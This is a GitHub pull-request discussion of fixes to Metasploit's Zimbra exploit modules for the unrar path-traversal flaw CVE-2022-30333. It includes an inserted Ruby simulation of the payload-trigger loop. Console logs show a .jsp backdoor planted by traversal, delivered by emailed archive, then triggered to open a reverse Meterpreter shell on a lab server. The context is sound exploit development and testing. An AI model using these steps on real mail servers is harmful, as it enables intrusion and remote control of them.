Zimbra fixes #17183
Conversation
…e generating artifacts if the server cannot be reached
@msjenkins-r7 test this please.
Thanks for these fixes @rbowes-r7! I just left one comment about using fail_with instead of return, otherwise these changes look good to me.
I found an issue that is likely not related to these changes but that might be fixed in this PR too. After emailing the payload (staged payload), the payload gets triggered and the first stager is sent. However, the second stage is never sent:
msf6 exploit(linux/http/zimbra_unrar_cve_2022_30333) > exploit verbose=true lhost=10.0.0.1 rhosts=10.0.0.30
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.
msf6 exploit(linux/http/zimbra_unrar_cve_2022_30333) >
[*] Started reverse TCP handler on 10.0.0.1:4444
[*] Encoding the payload as a .jsp file
[*] Target filename: ../../../../../../../../../../../../opt/zimbra/jetty_base/webapps/zimbra/public/xbiftax.jsp
[*] Checking the HTTP connection to the target
[+] payload.rar stored at /home/msfuser/.msf4/local/payload.rar
[+] File created! Email the file above to any user on the target Zimbra server
[*] Trying to trigger the backdoor @ public/xbiftax.jsp every 5s [backgrounding]...
msf6 exploit(linux/http/zimbra_unrar_cve_2022_30333) >
msf6 exploit(linux/http/zimbra_unrar_cve_2022_30333) > sendemail -f myuser@mail.donotexistdomain.foo -t msfuser@mail.donotexistdomain.foo -u 'Hello' -m 'test foo' -s 10.0.0.30 -o tls=no -a /home/msfuser/.msf4/local/payload.rar
[*] exec: sendemail -f myuser@mail.donotexistdomain.foo -t msfuser@mail.donotexistdomain.foo -u 'Hello' -m 'test foo' -s 10.0.0.30 -o tls=no -a /home/msfuser/.msf4/local/payload.rar
Nov 08 12:15:24 n00tmeg-desktop sendemail[67687]: Email was sent successfully!
msf6 exploit(linux/http/zimbra_unrar_cve_2022_30333) >
[*] Transmitting intermediate stager...(126 bytes)
[+] Successfully triggered the payload
[*] Sending stage (3045348 bytes) to 10.0.0.30
[!] This exploit may require manual cleanup of '../../../../../../../../../../../../opt/zimbra/jetty_base/webapps/zimbra/public/xbiftax.jsp' on the target
msf6 exploit(linux/http/zimbra_unrar_cve_2022_30333) > jobs
Jobs
====
No active jobs.
It looks like the handler is closed prematurely.
If I start a handler manually, it works:
msf6 exploit(linux/http/zimbra_unrar_cve_2022_30333) > use linux/x64/meterpreter/reverse_tcp
msf6 payload(linux/x64/meterpreter/reverse_tcp) > set LHOST 10.0.0.1
LHOST => 10.0.0.1
msf6 payload(linux/x64/meterpreter/reverse_tcp) > to_handler
[*] Payload Handler Started as Job 1
[*] Started reverse TCP handler on 10.0.0.1:4444
msf6 payload(linux/x64/meterpreter/reverse_tcp) >
msf6 payload(linux/x64/meterpreter/reverse_tcp) >
msf6 payload(linux/x64/meterpreter/reverse_tcp) >
msf6 payload(linux/x64/meterpreter/reverse_tcp) > previous
[*] Using configured payload linux/x64/meterpreter/reverse_tcp
msf6 exploit(linux/http/zimbra_unrar_cve_2022_30333) > exploit verbose=true lhost=10.0.0.1 rhosts=10.0.0.30
[*] Exploit running as background job 2.
[*] Exploit completed, but no session was created.
msf6 exploit(linux/http/zimbra_unrar_cve_2022_30333) >
[-] Handler failed to bind to 10.0.0.1:4444:- -
[*] Started reverse TCP handler on 0.0.0.0:4444
[*] Encoding the payload as a .jsp file
[*] Target filename: ../../../../../../../../../../../../opt/zimbra/jetty_base/webapps/zimbra/public/arjhjbwf.jsp
[*] Checking the HTTP connection to the target
[+] payload.rar stored at /home/msfuser/.msf4/local/payload.rar
[+] File created! Email the file above to any user on the target Zimbra server
[*] Trying to trigger the backdoor @ public/arjhjbwf.jsp every 5s [backgrounding]...
msf6 exploit(linux/http/zimbra_unrar_cve_2022_30333) > sendemail -f myuser@mail.donotexistdomain.foo -t msfuser@mail.donotexistdomain.foo -u 'Hello' -m 'test foo' -s 10.0.0.30 -o tls=no -a /home/msfuser/.msf4/local/payload.rar
[*] exec: sendemail -f myuser@mail.donotexistdomain.foo -t msfuser@mail.donotexistdomain.foo -u 'Hello' -m 'test foo' -s 10.0.0.30 -o tls=no -a /home/msfuser/.msf4/local/payload.rar
Nov 08 12:16:28 n00tmeg-desktop sendemail[67809]: Email was sent successfully!
msf6 exploit(linux/http/zimbra_unrar_cve_2022_30333) >
[*] Sending stage (3045348 bytes) to 10.0.0.30
[+] Successfully triggered the payload
[!] This exploit may require manual cleanup of '../../../../../../../../../../../../opt/zimbra/jetty_base/webapps/zimbra/public/arjhjbwf.jsp' on the target
msf6 exploit(linux/http/zimbra_unrar_cve_2022_30333) > [*] Meterpreter session 1 opened (10.0.0.1:4444 -> 10.0.0.30:47824) at 2022-11-08 12:16:29 +0100
msf6 exploit(linux/http/zimbra_unrar_cve_2022_30333) > sessions -1
[*] Starting interaction with 1...
meterpreter > sysinfo
Computer : mail.donotexistdomain.foo
OS : Ubuntu 18.04 (Linux 5.4.0-122-generic)
Architecture : x64
BuildTuple : x86_64-linux-musl
Meterpreter : x64/linux
meterpreter > getuid
Server username: zimbra
I fixed the simple thing (return -> fail_with). I think the issue was the handler closing here:
I changed it to set a variable and stop sending the HTTP request, but not stop the module (I made the same change to the cpio module as well). Not sure if there's a better way to "wait for shell", but this seems to work: a) it doesn't stop the module before getting the session, and b) it doesn't create multiple sessions by triggering the payload multiple times. LMK what you think!
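The comment above describes the shape of the fix rather than showing it. The following is an added example, not code from the PR or from the Metasploit modules: a stand-alone Ruby model of the "trigger the backdoor every 5s in the background, then wait for the shell" loop, with the behaviour before the fix (return as soon as the payload fires, which tears the handler down before a staged payload's second stage lands) next to the behaviour after it (set a flag, stop sending HTTP requests, keep the module alive until the handler reports a session). BackgroundTrigger, FakeTarget, simulate and the constructed timings are hypothetical; the real modules use Metasploit's send_request_cgi, on_new_session and handler machinery instead.

```ruby
# Added example, not the PR's code. Names and timings are hypothetical; see the
# lead-in above.

# Stand-in for the Zimbra host: GET of the planted .jsp returns 404 until the
# mail has been delivered and unrar has dropped the file, then 200.
class FakeTarget
  attr_reader :hits

  def initialize(ready_after:)
    @ready_after = ready_after # poll number on which the .jsp first exists
    @hits = 0
  end

  def trigger
    @hits += 1
    fired? ? 200 : 404
  end

  def fired?
    @hits >= @ready_after
  end
end

class BackgroundTrigger
  attr_reader :requests_sent, :session_opened

  # sleeper is injectable so the simulation below runs without sleeping.
  def initialize(target:, interval: 5, timeout: 120, &sleeper)
    @target = target
    @interval = interval
    @timeout = timeout
    @sleeper = sleeper || ->(secs) { sleep(secs) }
    @triggered = false
    @session_opened = false
    @requests_sent = 0
  end

  # What the payload handler calls once the (staged) session is established.
  def on_new_session
    @session_opened = true
  end

  # Before the fix: leave the module as soon as the payload fires. Returning
  # here tears the handler down, so a staged payload whose second stage has
  # not landed yet never becomes a session ("completed, but no session").
  def run_return_on_trigger
    each_tick do
      @requests_sent += 1
      return :triggered if @target.trigger == 200
    end
    :timeout
  end

  # After the fix: once the payload fires, stop sending HTTP requests (so the
  # backdoor is not re-executed and no duplicate sessions appear) but keep the
  # module, and therefore the handler, alive until on_new_session is called.
  def run_wait_for_session
    each_tick do
      return :session if @session_opened
      unless @triggered
        @requests_sent += 1
        @triggered = (@target.trigger == 200)
      end
    end
    @session_opened ? :session : :timeout
  end

  private

  def each_tick
    elapsed = 0
    while elapsed < @timeout
      yield
      @sleeper.call(@interval)
      elapsed += @interval
    end
  end
end

# Constructed scenario: the .jsp appears on poll `ready_after`; the second
# stage (and so the session) lands `stage_delay_ticks` sleeps after that.
def simulate(mode, ready_after: 3, stage_delay_ticks: 2)
  target = FakeTarget.new(ready_after: ready_after)
  bt = nil
  ticks_since_fire = 0
  sleeper = lambda do |_secs|
    next unless target.fired?
    ticks_since_fire += 1
    bt.on_new_session if ticks_since_fire == stage_delay_ticks
  end
  bt = BackgroundTrigger.new(target: target, &sleeper)
  result = bt.public_send(mode)
  { result: result, requests: bt.requests_sent, session: bt.session_opened }
end

if __FILE__ == $PROGRAM_NAME
  p simulate(:run_return_on_trigger) # => {:result=>:triggered, :requests=>3, :session=>false}
  p simulate(:run_wait_for_session)  # => {:result=>:session, :requests=>3, :session=>true}
end
```

The two runs send the same three HTTP requests; the difference is only what happens after the 200. The pre-fix loop exits on the first success and never sees the session, while the post-fix loop keeps ticking without touching the .jsp again until the handler calls on_new_session, and still gives up at the timeout if the payload never fires.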
Thanks @rbowes-r7! This seems to have fixed the issue. I tested both modules and they work as expected. I just found the
Release Notes
This adds some small changes, cleanups and fixes to the
These are a few small changes / cleanups to the Zimbra modules I wrote in the last couple months:
windows/ instead of linux/ - my bad!)
And this is what it looks like now: